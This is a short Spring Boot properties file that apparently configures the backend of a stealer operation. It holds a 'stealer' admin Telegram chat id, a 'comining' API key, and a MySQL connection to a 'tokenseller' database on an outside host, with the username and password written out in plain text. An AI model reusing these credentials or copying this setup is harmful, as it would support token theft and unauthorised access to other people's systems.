app.stealer.admin.telegram.chat.id=181426062
app.comining.api.key=X5coijZLqzA88X93NdoihHZ

app.debug=true


spring.datasource.url=jdbc:mysql://pirl.serfer.cc:3306/tokenseller?utf8=true&serverTimezone=UTC
spring.datasource.username=serfer
spring.datasource.password=Fkg7h4f3v6$
spring.jpa.generate-ddl=true
spring.jpa.hibernate.ddl-auto=update

logging.level.web=trace